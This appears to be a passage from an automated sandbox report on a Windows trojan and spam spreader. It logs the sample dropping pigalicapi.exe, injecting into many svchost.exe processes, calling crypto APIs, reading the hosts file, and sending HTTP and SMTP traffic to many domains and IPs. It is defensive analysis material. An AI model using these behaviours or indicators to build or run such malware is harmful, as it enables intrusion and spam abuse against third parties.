                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.com
                  Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.co
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comCookie: django_language=en
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: flamingorecordings.com
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.co
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.com
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
                  Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                  Source: unknownHTTPS traffic detected: 35.214.171.193:443 -> 192.168.2.4:50118 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.7:443 -> 192.168.2.4:50138 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 94.130.146.206:443 -> 192.168.2.4:50157 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 75.2.95.235:443 -> 192.168.2.4:50141 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 49.212.235.175:443 -> 192.168.2.4:50130 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.48.207:443 -> 192.168.2.4:50167 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.193.133:443 -> 192.168.2.4:50200 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 94.130.146.206:443 -> 192.168.2.4:50204 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.66.220:443 -> 192.168.2.4:50214 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.4:50212 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.4:50213 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.4:50215 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 5.189.171.125:443 -> 192.168.2.4:52616 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 83.223.113.46:443 -> 192.168.2.4:54016 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 5.189.171.125:443 -> 192.168.2.4:56895 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.7:443 -> 192.168.2.4:57238 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 94.130.146.206:443 -> 192.168.2.4:57325 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 35.214.171.193:443 -> 192.168.2.4:57433 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.4:57464 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.4:57472 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 94.130.146.206:443 -> 192.168.2.4:57723 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 75.2.95.235:443 -> 192.168.2.4:57738 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.193.133:443 -> 192.168.2.4:59014 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 83.223.113.46:443 -> 192.168.2.4:59205 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.4:59402 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.66.220:443 -> 192.168.2.4:59546 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 49.212.235.175:443 -> 192.168.2.4:59641 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.4:21182 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 5.189.171.125:443 -> 192.168.2.4:21191 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.48.207:443 -> 192.168.2.4:21205 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 35.214.171.193:443 -> 192.168.2.4:21213 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.66.220:443 -> 192.168.2.4:21227 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.4:21253 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.7:443 -> 192.168.2.4:21258 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 94.130.146.206:443 -> 192.168.2.4:21263 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.193.133:443 -> 192.168.2.4:21267 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 94.130.146.206:443 -> 192.168.2.4:21273 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 49.212.235.175:443 -> 192.168.2.4:21287 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 75.2.95.235:443 -> 192.168.2.4:21297 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 83.223.113.46:443 -> 192.168.2.4:21331 version: TLS 1.2

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Source: SMTPNetwork traffic detected: Mail traffic on many different IPs 40
                  Source: C:\Users\user\pigalicapi.exeCode function: 4_2_00EC8A70 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptImportKey,CryptDecrypt,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,4_2_00EC8A70
                  Source: C:\Users\user\pigalicapi.exeCode function: 4_2_00EC8800 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptGenKey,CryptExportKey,CryptImportKey,CryptExportKey,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,4_2_00EC8800
                  Source: C:\Users\user\pigalicapi.exeCode function: 4_2_00EC8970 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,4_2_00EC8970
                  Source: CX17SY6xF6.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: C:\Users\user\Desktop\CX17SY6xF6.exeCode function: 0_2_010D1F800_2_010D1F80
                  Source: C:\Users\user\Desktop\CX17SY6xF6.exeCode function: 0_2_010D3E700_2_010D3E70
                  Source: C:\Users\user\Desktop\CX17SY6xF6.exeCode function: 0_2_010E85700_2_010E8570
                  Source: C:\Users\user\Desktop\CX17SY6xF6.exeCode function: 0_2_010E55C00_2_010E55C0
                  Source: C:\Users\user\Desktop\CX17SY6xF6.exeCode function: 0_2_010D89DE0_2_010D89DE
                  Source: C:\Users\user\Desktop\CX17SY6xF6.exeCode function: 0_2_010DCDF60_2_010DCDF6
                  Source: C:\Users\user\Desktop\CX17SY6xF6.exeCode function: 0_2_010D28000_2_010D2800
                  Source: C:\Users\user\Desktop\CX17SY6xF6.exeCode function: 0_2_010D10000_2_010D1000
                  Source: C:\Users\user\Desktop\CX17SY6xF6.exeCode function: 0_2_010E74400_2_010E7440
                  Source: C:\Users\user\Desktop\CX17SY6xF6.exeCode function: 0_2_010D34500_2_010D3450
                  Source: C:\Users\user\Desktop\CX17SY6xF6.exeCode function: 0_2_010E88500_2_010E8850
                  Source: C:\Users\user\Desktop\CX17SY6xF6.exeCode function: 0_2_010D14C00_2_010D14C0
                  Source: C:\Users\user\Desktop\CX17SY6xF6.exeCode function: 0_2_010E67100_2_010E6710
                  Source: C:\Users\user\Desktop\CX17SY6xF6.exeCode function: 0_2_010D83400_2_010D8340
                  Source: C:\Users\user\Desktop\CX17SY6xF6.exeCode function: 0_2_010D42500_2_010D4250
                  Source: C:\Users\user\Desktop\CX17SY6xF6.exeCode function: 0_2_010E7E800_2_010E7E80
                  Source: C:\Users\user\Desktop\CX17SY6xF6.exeCode function: 0_2_010D36900_2_010D3690
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_00EF3E703_2_00EF3E70
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_00EF1F803_2_00EF1F80
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_00EF14C03_2_00EF14C0
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_00F088503_2_00F08850
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_00F074403_2_00F07440
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_00EF34503_2_00EF3450
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_00EF28003_2_00EF2800
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_00EF10003_2_00EF1000
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_00EFCDF63_2_00EFCDF6
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_00F055C03_2_00F055C0
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_00EF89DE3_2_00EF89DE
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_00F085703_2_00F08570
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_00F07E803_2_00F07E80
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_00EF36903_2_00EF3690
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_00EF42503_2_00EF4250
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_00EF83403_2_00EF8340
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_00F067103_2_00F06710
                  Source: C:\Users\user\pigalicapi.exeCode function: 4_2_00ED16984_2_00ED1698
                  Source: C:\Users\user\pigalicapi.exeCode function: 4_2_00E440A14_2_00E440A1
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0408A6BA5_2_0408A6BA
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_04007F795_2_04007F79
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_040077995_2_04007799
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0400B9355_2_0400B935
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_040072C45_2_040072C4
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_04007B6D5_2_04007B6D
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_040083995_2_04008399
                  Source: CX17SY6xF6.exeReversingLabs: Detection: 28%
                  Source: CX17SY6xF6.exeVirustotal: Detection: 34%
                  Source: C:\Users\user\Desktop\CX17SY6xF6.exeFile read: C:\Users\user\Desktop\CX17SY6xF6.exeJump to behavior
                  Source: CX17SY6xF6.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\CX17SY6xF6.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\CX17SY6xF6.exe C:\Users\user\Desktop\CX17SY6xF6.exe
                  Source: unknownProcess created: C:\Users\user\pigalicapi.exe "C:\Users\user\pigalicapi.exe"
                  Source: unknownProcess created: C:\Users\user\pigalicapi.exe "C:\Users\user\pigalicapi.exe"
                  Source: C:\Users\user\Desktop\CX17SY6xF6.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                  Source: C:\Users\user\pigalicapi.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                  Source: C:\Users\user\Desktop\CX17SY6xF6.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                  Source: C:\Users\user\pigalicapi.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                  Source: C:\Users\user\Desktop\CX17SY6xF6.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                  Source: C:\Users\user\Desktop\CX17SY6xF6.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                  Source: C:\Users\user\pigalicapi.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                  Source: C:\Users\user\pigalicapi.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                  Source: C:\Users\user\Desktop\CX17SY6xF6.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                  Source: C:\Users\user\Desktop\CX17SY6xF6.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
                  Source: classification engineClassification label: mal100.spre.troj.evad.winEXE@27/4@2054/100
                  Source: C:\Users\user\pigalicapi.exeCode function: 4_2_00EC1CA0 CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,Process32First,lstrlenA,lstrcpyA,OpenProcess,EnumProcessModules,K32EnumProcessModules,GetModuleFileNameExA,GetProcessImageFileNameA,K32GetProcessImageFileNameA,FindCloseChangeNotification,Process32Next,CloseHandle,4_2_00EC1CA0
                  Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\zczoiir65502
                  Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\rjsfitz60229
                  Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\pvoaiwz6588
                  Source: C:\Users\user\Desktop\CX17SY6xF6.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\CX17SY6xF6.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\pigalicapi.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\pigalicapi.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\pigalicapi.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\pigalicapi.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: CX17SY6xF6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: CX17SY6xF6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: CX17SY6xF6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: CX17SY6xF6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: CX17SY6xF6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: CX17SY6xF6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: CX17SY6xF6.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT
                  Source: CX17SY6xF6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: CX17SY6xF6.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: CX17SY6xF6.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: CX17SY6xF6.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: CX17SY6xF6.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: CX17SY6xF6.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                  Data Obfuscation

                  barindex
                  Source: C:\Users\user\pigalicapi.exeUnpacked PE file: 3.2.pigalicapi.exe.1500000.1.unpack
                  Source: C:\Users\user\Desktop\CX17SY6xF6.exeCode function: 0_2_010DDF86 push ecx; ret 0_2_010DDF99
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_00EFDF86 push ecx; ret 3_2_00EFDF99
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_04009D2D push ecx; ret 5_2_04009D40
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_04000E0A push ebp; ret 5_2_04000E0B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0408B08C push es; iretd 5_2_0408B09A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0408B0CB push 7240BFEDh; ret 5_2_0408B0D2
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0408A9BB push E44F2B70h; ret 5_2_0408AA63
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0408AA04 push E44F2B70h; ret 5_2_0408AA63
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0408B378 push eax; ret 5_2_0408B389
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0408B3D9 pushfd ; ret 5_2_0408B3E0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0408BF20 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,5_2_0408BF20

                  Persistence and Installation Behavior

                  barindex
                  Source: Yara matchFile source: 4.2.pigalicapi.exe.ec0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.pigalicapi.exe.ec0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.svchost.exe.4000000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.pigalicapi.exe.1500000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.CX17SY6xF6.exe.d60000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.svchost.exe.4000000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.svchost.exe.4000000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.pigalicapi.exe.1500000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.CX17SY6xF6.exe.d60000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.svchost.exe.4000000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.863723197.0000000001500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.860363475.0000000000D60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: C:\Users\user\Desktop\CX17SY6xF6.exeFile created: C:\Users\user\pigalicapi.exeJump to dropped file
